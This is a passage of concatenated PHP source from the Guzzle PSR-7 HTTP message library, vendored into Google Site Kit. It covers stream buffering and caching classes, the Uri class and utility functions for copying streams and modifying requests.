$this->buffer->read($length); $readLen = \strlen($data); $this->tellPos += $readLen; $remaining = $length - $readLen; if ($remaining) { $this->pump($remaining); $data .= $this->buffer->read($remaining); $this->tellPos += \strlen($data) - $readLen; } return $data; } public function getContents() : string { $result = ''; while (!$this->eof()) { $result .= $this->read(1000000); } return $result; } /** * @return mixed */ public function getMetadata($key = null) { if (!$key) { return $this->metadata; } return $this->metadata[$key] ?? null; } private function pump(int $length) : void { if ($this->source !== null) { do { $data = ($this->source)($length); if ($data === \false || $data === null) { $this->source = null; return; } $this->buffer->write($data); $length -= \strlen($data); } while ($length > 0); } } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Provides a buffer stream that can be written to to fill a buffer, and read * from to remove bytes from the buffer. * * This stream returns a "hwm" metadata value that tells upstream consumers * what the configured high water mark of the stream is, or the maximum * preferred size of the buffer. */ final class BufferStream implements \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { /** @var int */ private $hwm; /** @var string */ private $buffer = ''; /** * @param int $hwm High water mark, representing the preferred maximum * buffer size. If the size of the buffer exceeds the high * water mark, then calls to write will continue to succeed * but will return 0 to inform writers to slow down * until the buffer has been drained by reading from it. */ public function __construct(int $hwm = 16384) { $this->hwm = $hwm; } public function __toString() : string { return $this->getContents(); } public function getContents() : string { $buffer = $this->buffer; $this->buffer = ''; return $buffer; } public function close() : void { $this->buffer = ''; } public function detach() { $this->close(); return null; } public function getSize() : ?int { return \strlen($this->buffer); } public function isReadable() : bool { return \true; } public function isWritable() : bool { return \true; } public function isSeekable() : bool { return \false; } public function rewind() : void { $this->seek(0); } public function seek($offset, $whence = \SEEK_SET) : void { throw new \RuntimeException('Cannot seek a BufferStream'); } public function eof() : bool { return \strlen($this->buffer) === 0; } public function tell() : int { throw new \RuntimeException('Cannot determine the position of a BufferStream'); } /** * Reads data from the buffer. */ public function read($length) : string { $currentLength = \strlen($this->buffer); if ($length >= $currentLength) { // No need to slice the buffer because we don't have enough data. $result = $this->buffer; $this->buffer = ''; } else { // Slice up the result to provide a subset of the buffer. $result = \substr($this->buffer, 0, $length); $this->buffer = \substr($this->buffer, $length); } return $result; } /** * Writes data to the buffer. */ public function write($string) : int { $this->buffer .= $string; if (\strlen($this->buffer) >= $this->hwm) { return 0; } return \strlen($string); } /** * @return mixed */ public function getMetadata($key = null) { if ($key === 'hwm') { return $this->hwm; } return $key ? null : []; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Exception\MalformedUriException; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * PSR-7 URI implementation. * * @author Michael Dowling * @author Tobias Schultze * @author Matthew Weier O'Phinney */ class Uri implements \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface, \JsonSerializable { /** * Absolute http and https URIs require a host per RFC 7230 Section 2.7 * but in generic URIs the host can be empty. So for http(s) URIs * we apply this default host when no host is given yet to form a * valid URI. */ private const HTTP_DEFAULT_HOST = 'localhost'; private const DEFAULT_PORTS = ['http' => 80, 'https' => 443, 'ftp' => 21, 'gopher' => 70, 'nntp' => 119, 'news' => 119, 'telnet' => 23, 'tn3270' => 23, 'imap' => 143, 'pop' => 110, 'ldap' => 389]; /** * Unreserved characters for use in a regex. * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-2.3 */ private const CHAR_UNRESERVED = 'a-zA-Z0-9_\\-\\.~'; /** * Sub-delims for use in a regex. * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-2.2 */ private const CHAR_SUB_DELIMS = '!\\$&\'\\(\\)\\*\\+,;='; private const QUERY_SEPARATORS_REPLACEMENT = ['=' => '%3D', '&' => '%26']; /** @var string Uri scheme. */ private $scheme = ''; /** @var string Uri user info. */ private $userInfo = ''; /** @var string Uri host. */ private $host = ''; /** @var int|null Uri port. */ private $port; /** @var string Uri path. */ private $path = ''; /** @var string Uri query string. */ private $query = ''; /** @var string Uri fragment. */ private $fragment = ''; /** @var string|null String representation */ private $composedComponents; public function __construct(string $uri = '') { if ($uri !== '') { $parts = self::parse($uri); if ($parts === \false) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Exception\MalformedUriException("Unable to parse URI: {$uri}"); } $this->applyParts($parts); } } /** * UTF-8 aware \parse_url() replacement. * * The internal function produces broken output for non ASCII domain names * (IDN) when used with locales other than "C". * * On the other hand, cURL understands IDN correctly only when UTF-8 locale * is configured ("C.UTF-8", "en_US.UTF-8", etc.). * * @see https://bugs.php.net/bug.php?id=52923 * @see https://www.php.net/manual/en/function.parse-url.php#114817 * @see https://curl.haxx.se/libcurl/c/CURLOPT_URL.html#ENCODING * * @return array|false */ private static function parse(string $url) { // If IPv6 $prefix = ''; if (\preg_match('%^(.*://\\[[0-9:a-f]+\\])(.*?)$%', $url, $matches)) { /** @var array{0:string, 1:string, 2:string} $matches */ $prefix = $matches[1]; $url = $matches[2]; } /** @var string */ $encodedUrl = \preg_replace_callback('%[^:/@?&=#]+%usD', static function ($matches) { return \urlencode($matches[0]); }, $url); $result = \parse_url($prefix . $encodedUrl); if ($result === \false) { return \false; } return \array_map('urldecode', $result); } public function __toString() : string { if ($this->composedComponents === null) { $this->composedComponents = self::composeComponents($this->scheme, $this->getAuthority(), $this->path, $this->query, $this->fragment); } return $this->composedComponents; } /** * Composes a URI reference string from its various components. * * Usually this method does not need to be called manually but instead is used indirectly via * `Psr\Http\Message\UriInterface::__toString`. * * PSR-7 UriInterface treats an empty component the same as a missing component as * getQuery(), getFragment() etc. always return a string. This explains the slight * difference to RFC 3986 Section 5.3. * * Another adjustment is that the authority separator is added even when the authority is missing/empty * for the "file" scheme. This is because PHP stream functions like `file_get_contents` only work with * `file:///myfile` but not with `file:/myfile` although they are equivalent according to RFC 3986. But * `file:///` is the more common syntax for the file scheme anyway (Chrome for example redirects to * that format). * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-5.3 */ public static function composeComponents(?string $scheme, ?string $authority, string $path, ?string $query, ?string $fragment) : string { $uri = ''; // weak type checks to also accept null until we can add scalar type hints if ($scheme != '') { $uri .= $scheme . ':'; } if ($authority != '' || $scheme === 'file') { $uri .= '//' . $authority; } if ($authority != '' && $path != '' && $path[0] != '/') { $path = '/' . $path; } $uri .= $path; if ($query != '') { $uri .= '?' . $query; } if ($fragment != '') { $uri .= '#' . $fragment; } return $uri; } /** * Whether the URI has the default port of the current scheme. * * `Psr\Http\Message\UriInterface::getPort` may return null or the standard port. This method can be used * independently of the implementation. */ public static function isDefaultPort(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri) : bool { return $uri->getPort() === null || isset(self::DEFAULT_PORTS[$uri->getScheme()]) && $uri->getPort() === self::DEFAULT_PORTS[$uri->getScheme()]; } /** * Whether the URI is absolute, i.e. it has a scheme. * * An instance of UriInterface can either be an absolute URI or a relative reference. This method returns true * if it is the former. An absolute URI has a scheme. A relative reference is used to express a URI relative * to another URI, the base URI. Relative references can be divided into several forms: * - network-path references, e.g. '//example.com/path' * - absolute-path references, e.g. '/path' * - relative-path references, e.g. 'subpath' * * @see Uri::isNetworkPathReference * @see Uri::isAbsolutePathReference * @see Uri::isRelativePathReference * @see https://datatracker.ietf.org/doc/html/rfc3986#section-4 */ public static function isAbsolute(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri) : bool { return $uri->getScheme() !== ''; } /** * Whether the URI is a network-path reference. * * A relative reference that begins with two slash characters is termed an network-path reference. * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-4.2 */ public static function isNetworkPathReference(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri) : bool { return $uri->getScheme() === '' && $uri->getAuthority() !== ''; } /** * Whether the URI is a absolute-path reference. * * A relative reference that begins with a single slash character is termed an absolute-path reference. * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-4.2 */ public static function isAbsolutePathReference(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri) : bool { return $uri->getScheme() === '' && $uri->getAuthority() === '' && isset($uri->getPath()[0]) && $uri->getPath()[0] === '/'; } /** * Whether the URI is a relative-path reference. * * A relative reference that does not begin with a slash character is termed a relative-path reference. * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-4.2 */ public static function isRelativePathReference(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri) : bool { return $uri->getScheme() === '' && $uri->getAuthority() === '' && (!isset($uri->getPath()[0]) || $uri->getPath()[0] !== '/'); } /** * Whether the URI is a same-document reference. * * A same-document reference refers to a URI that is, aside from its fragment * component, identical to the base URI. When no base URI is given, only an empty * URI reference (apart from its fragment) is considered a same-document reference. * * @param UriInterface $uri The URI to check * @param UriInterface|null $base An optional base URI to compare against * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-4.4 */ public static function isSameDocumentReference(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri, ?\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $base = null) : bool { if ($base !== null) { $uri = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\UriResolver::resolve($base, $uri); return $uri->getScheme() === $base->getScheme() && $uri->getAuthority() === $base->getAuthority() && $uri->getPath() === $base->getPath() && $uri->getQuery() === $base->getQuery(); } return $uri->getScheme() === '' && $uri->getAuthority() === '' && $uri->getPath() === '' && $uri->getQuery() === ''; } /** * Creates a new URI with a specific query string value removed. * * Any existing query string values that exactly match the provided key are * removed. * * @param UriInterface $uri URI to use as a base. * @param string $key Query string key to remove. */ public static function withoutQueryValue(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri, string $key) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $result = self::getFilteredQueryString($uri, [$key]); return $uri->withQuery(\implode('&', $result)); } /** * Creates a new URI with a specific query string value. * * Any existing query string values that exactly match the provided key are * removed and replaced with the given key value pair. * * A value of null will set the query string key without a value, e.g. "key" * instead of "key=value". * * @param UriInterface $uri URI to use as a base. * @param string $key Key to set. * @param string|null $value Value to set */ public static function withQueryValue(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri, string $key, ?string $value) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $result = self::getFilteredQueryString($uri, [$key]); $result[] = self::generateQueryString($key, $value); return $uri->withQuery(\implode('&', $result)); } /** * Creates a new URI with multiple specific query string values. * * It has the same behavior as withQueryValue() but for an associative array of key => value. * * @param UriInterface $uri URI to use as a base. * @param (string|null)[] $keyValueArray Associative array of key and values */ public static function withQueryValues(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri, array $keyValueArray) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $result = self::getFilteredQueryString($uri, \array_keys($keyValueArray)); foreach ($keyValueArray as $key => $value) { $result[] = self::generateQueryString((string) $key, $value !== null ? (string) $value : null); } return $uri->withQuery(\implode('&', $result)); } /** * Creates a URI from a hash of `parse_url` components. * * @see https://www.php.net/manual/en/function.parse-url.php * * @throws MalformedUriException If the components do not form a valid URI. */ public static function fromParts(array $parts) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $uri = new self(); $uri->applyParts($parts); $uri->validateState(); return $uri; } public function getScheme() : string { return $this->scheme; } public function getAuthority() : string { $authority = $this->host; if ($this->userInfo !== '') { $authority = $this->userInfo . '@' . $authority; } if ($this->port !== null) { $authority .= ':' . $this->port; } return $authority; } public function getUserInfo() : string { return $this->userInfo; } public function getHost() : string { return $this->host; } public function getPort() : ?int { return $this->port; } public function getPath() : string { return $this->path; } public function getQuery() : string { return $this->query; } public function getFragment() : string { return $this->fragment; } public function withScheme($scheme) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $scheme = $this->filterScheme($scheme); if ($this->scheme === $scheme) { return $this; } $new = clone $this; $new->scheme = $scheme; $new->composedComponents = null; $new->removeDefaultPort(); $new->validateState(); return $new; } public function withUserInfo($user, $password = null) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $info = $this->filterUserInfoComponent($user); if ($password !== null) { $info .= ':' . $this->filterUserInfoComponent($password); } if ($this->userInfo === $info) { return $this; } $new = clone $this; $new->userInfo = $info; $new->composedComponents = null; $new->validateState(); return $new; } public function withHost($host) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $host = $this->filterHost($host); if ($this->host === $host) { return $this; } $new = clone $this; $new->host = $host; $new->composedComponents = null; $new->validateState(); return $new; } public function withPort($port) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $port = $this->filterPort($port); if ($this->port === $port) { return $this; } $new = clone $this; $new->port = $port; $new->composedComponents = null; $new->removeDefaultPort(); $new->validateState(); return $new; } public function withPath($path) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $path = $this->filterPath($path); if ($this->path === $path) { return $this; } $new = clone $this; $new->path = $path; $new->composedComponents = null; $new->validateState(); return $new; } public function withQuery($query) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $query = $this->filterQueryAndFragment($query); if ($this->query === $query) { return $this; } $new = clone $this; $new->query = $query; $new->composedComponents = null; return $new; } public function withFragment($fragment) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $fragment = $this->filterQueryAndFragment($fragment); if ($this->fragment === $fragment) { return $this; } $new = clone $this; $new->fragment = $fragment; $new->composedComponents = null; return $new; } public function jsonSerialize() : string { return $this->__toString(); } /** * Apply parse_url parts to a URI. * * @param array $parts Array of parse_url parts to apply. */ private function applyParts(array $parts) : void { $this->scheme = isset($parts['scheme']) ? $this->filterScheme($parts['scheme']) : ''; $this->userInfo = isset($parts['user']) ? $this->filterUserInfoComponent($parts['user']) : ''; $this->host = isset($parts['host']) ? $this->filterHost($parts['host']) : ''; $this->port = isset($parts['port']) ? $this->filterPort($parts['port']) : null; $this->path = isset($parts['path']) ? $this->filterPath($parts['path']) : ''; $this->query = isset($parts['query']) ? $this->filterQueryAndFragment($parts['query']) : ''; $this->fragment = isset($parts['fragment']) ? $this->filterQueryAndFragment($parts['fragment']) : ''; if (isset($parts['pass'])) { $this->userInfo .= ':' . $this->filterUserInfoComponent($parts['pass']); } $this->removeDefaultPort(); } /** * @param mixed $scheme * * @throws \InvalidArgumentException If the scheme is invalid. */ private function filterScheme($scheme) : string { if (!\is_string($scheme)) { throw new \InvalidArgumentException('Scheme must be a string'); } return \strtr($scheme, 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', 'abcdefghijklmnopqrstuvwxyz'); } /** * @param mixed $component * * @throws \InvalidArgumentException If the user info is invalid. */ private function filterUserInfoComponent($component) : string { if (!\is_string($component)) { throw new \InvalidArgumentException('User info must be a string'); } return \preg_replace_callback('/(?:[^%' . self::CHAR_UNRESERVED . self::CHAR_SUB_DELIMS . ']+|%(?![A-Fa-f0-9]{2}))/', [$this, 'rawurlencodeMatchZero'], $component); } /** * @param mixed $host * * @throws \InvalidArgumentException If the host is invalid. */ private function filterHost($host) : string { if (!\is_string($host)) { throw new \InvalidArgumentException('Host must be a string'); } return \strtr($host, 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', 'abcdefghijklmnopqrstuvwxyz'); } /** * @param mixed $port * * @throws \InvalidArgumentException If the port is invalid. */ private function filterPort($port) : ?int { if ($port === null) { return null; } $port = (int) $port; if (0 > $port || 0xffff < $port) { throw new \InvalidArgumentException(\sprintf('Invalid port: %d. Must be between 0 and 65535', $port)); } return $port; } /** * @param (string|int)[] $keys * * @return string[] */ private static function getFilteredQueryString(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri, array $keys) : array { $current = $uri->getQuery(); if ($current === '') { return []; } $decodedKeys = \array_map(function ($k) : string { return \rawurldecode((string) $k); }, $keys); return \array_filter(\explode('&', $current), function ($part) use($decodedKeys) { return !\in_array(\rawurldecode(\explode('=', $part)[0]), $decodedKeys, \true); }); } private static function generateQueryString(string $key, ?string $value) : string { // Query string separators ("=", "&") within the key or value need to be encoded // (while preventing double-encoding) before setting the query string. All other // chars that need percent-encoding will be encoded by withQuery(). $queryString = \strtr($key, self::QUERY_SEPARATORS_REPLACEMENT); if ($value !== null) { $queryString .= '=' . \strtr($value, self::QUERY_SEPARATORS_REPLACEMENT); } return $queryString; } private function removeDefaultPort() : void { if ($this->port !== null && self::isDefaultPort($this)) { $this->port = null; } } /** * Filters the path of a URI * * @param mixed $path * * @throws \InvalidArgumentException If the path is invalid. */ private function filterPath($path) : string { if (!\is_string($path)) { throw new \InvalidArgumentException('Path must be a string'); } return \preg_replace_callback('/(?:[^' . self::CHAR_UNRESERVED . self::CHAR_SUB_DELIMS . '%:@\\/]++|%(?![A-Fa-f0-9]{2}))/', [$this, 'rawurlencodeMatchZero'], $path); } /** * Filters the query string or fragment of a URI. * * @param mixed $str * * @throws \InvalidArgumentException If the query or fragment is invalid. */ private function filterQueryAndFragment($str) : string { if (!\is_string($str)) { throw new \InvalidArgumentException('Query and fragment must be a string'); } return \preg_replace_callback('/(?:[^' . self::CHAR_UNRESERVED . self::CHAR_SUB_DELIMS . '%:@\\/\\?]++|%(?![A-Fa-f0-9]{2}))/', [$this, 'rawurlencodeMatchZero'], $str); } private function rawurlencodeMatchZero(array $match) : string { return \rawurlencode($match[0]); } private function validateState() : void { if ($this->host === '' && ($this->scheme === 'http' || $this->scheme === 'https')) { $this->host = self::HTTP_DEFAULT_HOST; } if ($this->getAuthority() === '') { if (0 === \strpos($this->path, '//')) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Exception\MalformedUriException('The path of a URI without an authority must not start with two slashes "//"'); } if ($this->scheme === '' && \false !== \strpos(\explode('/', $this->path, 2)[0], ':')) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Exception\MalformedUriException('A relative URI must not have a path beginning with a segment containing a colon'); } } } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Stream decorator that can cache previously read bytes from a sequentially * read stream. */ final class CachingStream implements \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { use StreamDecoratorTrait; /** @var StreamInterface Stream being wrapped */ private $remoteStream; /** @var int Number of bytes to skip reading due to a write on the buffer */ private $skipReadBytes = 0; /** * @var StreamInterface */ private $stream; /** * We will treat the buffer object as the body of the stream * * @param StreamInterface $stream Stream to cache. The cursor is assumed to be at the beginning of the stream. * @param StreamInterface $target Optionally specify where data is cached */ public function __construct(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $stream, ?\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $target = null) { $this->remoteStream = $stream; $this->stream = $target ?: new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Stream(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::tryFopen('php://temp', 'r+')); } public function getSize() : ?int { $remoteSize = $this->remoteStream->getSize(); if (null === $remoteSize) { return null; } return \max($this->stream->getSize(), $remoteSize); } public function rewind() : void { $this->seek(0); } public function seek($offset, $whence = \SEEK_SET) : void { if ($whence === \SEEK_SET) { $byte = $offset; } elseif ($whence === \SEEK_CUR) { $byte = $offset + $this->tell(); } elseif ($whence === \SEEK_END) { $size = $this->remoteStream->getSize(); if ($size === null) { $size = $this->cacheEntireStream(); } $byte = $size + $offset; } else { throw new \InvalidArgumentException('Invalid whence'); } $diff = $byte - $this->stream->getSize(); if ($diff > 0) { // Read the remoteStream until we have read in at least the amount // of bytes requested, or we reach the end of the file. while ($diff > 0 && !$this->remoteStream->eof()) { $this->read($diff); $diff = $byte - $this->stream->getSize(); } } else { // We can just do a normal seek since we've already seen this byte. $this->stream->seek($byte); } } public function read($length) : string { // Perform a regular read on any previously read data from the buffer $data = $this->stream->read($length); $remaining = $length - \strlen($data); // More data was requested so read from the remote stream if ($remaining) { // If data was written to the buffer in a position that would have // been filled from the remote stream, then we must skip bytes on // the remote stream to emulate overwriting bytes from that // position. This mimics the behavior of other PHP stream wrappers. $remoteData = $this->remoteStream->read($remaining + $this->skipReadBytes); if ($this->skipReadBytes) { $len = \strlen($remoteData); $remoteData = \substr($remoteData, $this->skipReadBytes); $this->skipReadBytes = \max(0, $this->skipReadBytes - $len); } $data .= $remoteData; $this->stream->write($remoteData); } return $data; } public function write($string) : int { // When appending to the end of the currently read stream, you'll want // to skip bytes from being read from the remote stream to emulate // other stream wrappers. Basically replacing bytes of data of a fixed // length. $overflow = \strlen($string) + $this->tell() - $this->remoteStream->tell(); if ($overflow > 0) { $this->skipReadBytes += $overflow; } return $this->stream->write($string); } public function eof() : bool { return $this->stream->eof() && $this->remoteStream->eof(); } /** * Close both the remote stream and buffer stream */ public function close() : void { $this->remoteStream->close(); $this->stream->close(); } private function cacheEntireStream() : int { $target = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\FnStream(['write' => 'strlen']); \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::copyToStream($this, $target); return $this->tell(); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; final class Utils { /** * Remove the items given by the keys, case insensitively from the data. * * @param (string|int)[] $keys */ public static function caselessRemove(array $keys, array $data) : array { $result = []; foreach ($keys as &$key) { $key = \strtolower((string) $key); } foreach ($data as $k => $v) { if (!\in_array(\strtolower((string) $k), $keys)) { $result[$k] = $v; } } return $result; } /** * Copy the contents of a stream into another stream until the given number * of bytes have been read. * * @param StreamInterface $source Stream to read from * @param StreamInterface $dest Stream to write to * @param int $maxLen Maximum number of bytes to read. Pass -1 * to read the entire stream. * * @throws \RuntimeException on error. */ public static function copyToStream(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $source, \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $dest, int $maxLen = -1) : void { $bufferSize = 8192; if ($maxLen === -1) { while (!$source->eof()) { if (!$dest->write($source->read($bufferSize))) { break; } } } else { $remaining = $maxLen; while ($remaining > 0 && !$source->eof()) { $buf = $source->read(\min($bufferSize, $remaining)); $len = \strlen($buf); if (!$len) { break; } $remaining -= $len; $dest->write($buf); } } } /** * Copy the contents of a stream into a string until the given number of * bytes have been read. * * @param StreamInterface $stream Stream to read * @param int $maxLen Maximum number of bytes to read. Pass -1 * to read the entire stream. * * @throws \RuntimeException on error. */ public static function copyToString(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $stream, int $maxLen = -1) : string { $buffer = ''; if ($maxLen === -1) { while (!$stream->eof()) { $buf = $stream->read(1048576); if ($buf === '') { break; } $buffer .= $buf; } return $buffer; } $len = 0; while (!$stream->eof() && $len < $maxLen) { $buf = $stream->read($maxLen - $len); if ($buf === '') { break; } $buffer .= $buf; $len = \strlen($buffer); } return $buffer; } /** * Calculate a hash of a stream. * * This method reads the entire stream to calculate a rolling hash, based * on PHP's `hash_init` functions. * * @param StreamInterface $stream Stream to calculate the hash for * @param string $algo Hash algorithm (e.g. md5, crc32, etc) * @param bool $rawOutput Whether or not to use raw output * * @throws \RuntimeException on error. */ public static function hash(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $stream, string $algo, bool $rawOutput = \false) : string { $pos = $stream->tell(); if ($pos > 0) { $stream->rewind(); } $ctx = \hash_init($algo); while (!$stream->eof()) { \hash_update($ctx, $stream->read(1048576)); } $out = \hash_final($ctx, $rawOutput); $stream->seek($pos); return $out; } /** * Clone and modify a request with the given changes. * * This method is useful for reducing the number of clones needed to mutate * a message. * * The changes can be one of: * - method: (string) Changes the HTTP method. * - set_headers: (array) Sets the given headers. * - remove_headers: (array) Remove the given headers. * - body: (mixed) Sets the given body. * - uri: (UriInterface) Set the URI. * - query: (string) Set the query string value of the URI. * - version: (string) Set the protocol version. * * @param RequestInterface $request Request to clone and modify. * @param array $changes Changes to apply. */ public static function modifyRequest(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $changes) : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface { if (!$changes) { return $request; } $headers = $request->getHeaders(); if (!isset($changes['uri'])) { $uri = $request->getUri(); } else { // Remove the host header if one is on the URI if ($host = $changes['uri']->getHost()) { $changes['set_headers']['Host'] = $host; if ($port = $changes['uri']->getPort()) { $standardPorts = ['http' => 80, 'https' => 443]; $scheme = $changes['uri']->getScheme(); if (isset($standardPorts[$scheme]) && $port != $standardPorts[$scheme]) { $changes['set_headers']['Host'] .= ':' . $port; } } } $uri = $changes['uri']; } if (!empty($changes['remove_headers'])) { $headers = self::caselessRemove($changes['remove_headers'], $headers); } if (!empty($changes['set_headers'])) { $headers = self::caselessRemove(\array_keys($changes['set_headers']), $headers); $headers = $changes['set_headers'] + $headers; } if (isset($changes['query'])) { $uri = $uri->withQuery($changes['query']); } if ($request instanceof \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface) { $new = (new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\ServerRequest($changes['method'] ?? $request->getMethod(), $uri, $headers, $changes['body'] ?? $request->getBody(), $changes['version'] ?? $request->getProtocolVersion(), $request->getServerParams()))->withParsedBody($request->getParsedBody())->withQueryParams($request->getQueryParams())->withCookieParams($request->getCookieParams())->withUploadedFiles($request->getUploadedFiles()); foreach ($request->getAttributes() as $key => $value) { $new = $new->withAttribute($key, $value); } return $new; } return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request($changes['method'] ?? $request->getMethod(), $uri, $headers, $changes['body'] ?? $request->getBody(), $changes['version'] ?? $request->getProtocolVersion()); } /** * Read a line from the stream up to the maximum allowed buffer length. * * @param StreamInterface $stream Stream to read from * @param int|null $maxLength Maximum buffer length */ public static function readLine(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $stream, ?int $maxLength = null) : string { $buffer = ''; $size = 0; while (!$stream->eof()) { if ('' === ($byte = $stream->read(1))) { return $buffer; } $buffer .= $byte; // Break when a new line is found or the max length - 1 is reached if ($byte === "\n" || ++$size === $maxLength - 1) { break; } } return $buffer; } /** * Redact the password in the user info part of a URI. */ public static function redactUserInfo(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $userInfo = $uri->getUserInfo(); if (\false !== ($pos = \strpos($userInfo, ':'))) { return $uri->withUserInfo(\substr($userInfo, 0, $pos), '***'); } return $uri; } /** * Create a new stream based on the input type. * * Options is an associative array that can contain the following keys: * - metadata: Array of custom metadata. * - size: Size of the stream. * * This method accepts the following `$resource` types: * - `Psr\Http\Message\StreamInterface`: Returns the value as-is. * - `string`: Creates a stream object that uses the given string as the contents. * - `resource`: Creates a stream object that wraps the given PHP stream resource. * - `Iterator`: If the provided value implements `Iterator`, then a read-only * stream object will be created that wraps the given iterable. Each time the * stream is read from, data from the iterator will fill a buffer and will be * continuously called until the buffer is equal to the requested read size. * Subsequent read calls will first read from the buffer and then call `next` * on the underlying iterator until it is exhausted. * - `object` with `__toString()`: If the object has the `__toString()` method, * the object will be cast to a string and then a stream will be returned that * uses the string value. * - `NULL`: When `null` is passed, an empty stream object is returned. * - `callable` When a callable is passed, a read-only stream object will be * created that invokes the given callable. The callable is invoked with the * number of suggested bytes to read. The callable can return any number of * bytes, but MUST return `false` when there is no more data to return. The * stream object that wraps the callable will invoke the callable until the * number of requested bytes are available. Any additional bytes will be * buffered and used in subsequent reads. * * @param resource|string|int|float|bool|StreamInterface|callable|\Iterator|null $resource Entity body data * @param array{size?: int, metadata?: array} $options Additional options * * @throws \InvalidArgumentException if the $resource arg is not valid. */ public static function streamFor($resource = '', array $options = []) : \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { if (\is_scalar($resource)) { $stream = self::tryFopen('php://temp', 'r+'); if ($resource !== '') { \fwrite($stream, (string) $resource); \fseek($stream, 0); } return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Stream($stream, $options); } switch (\gettype($resource)) { case 'resource': /* * The 'php://input' is a special stream with quirks and inconsistencies. * We avoid using that stream by reading it into php://temp */ /** @var resource $resource */ if ((\stream_get_meta_data($resource)['uri'] ?? '') === 'php://input') { $stream = self::tryFopen('php://temp', 'w+'); \stream_copy_to_stream($resource, $stream); \fseek($stream, 0); $resource = $stream; } return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Stream($resource, $options); case 'object': /** @var object $resource */ if ($resource instanceof \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface) { return $resource; } elseif ($resource instanceof \Iterator) { return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\PumpStream(function () use($resource) { if (!$resource->valid()) { return \false; } $result = $resource->current(); $resource->next(); return $result; }, $options); } elseif (\method_exists($resource, '__toString')) { return self::streamFor((string) $resource, $options); } break; case 'NULL': return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Stream(self::tryFopen('php://temp', 'r+'), $options); } if (\is_callable($resource)) { return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\PumpStream($resource, $options); } throw new \InvalidArgumentException('Invalid resource type: ' . \gettype($resource)); } /** * Safely opens a PHP stream resource using a filename. * * When fopen fails, PHP normally raises a warning. This function adds an * error handler that checks for errors and throws an exception instead. * * @param string $filename File 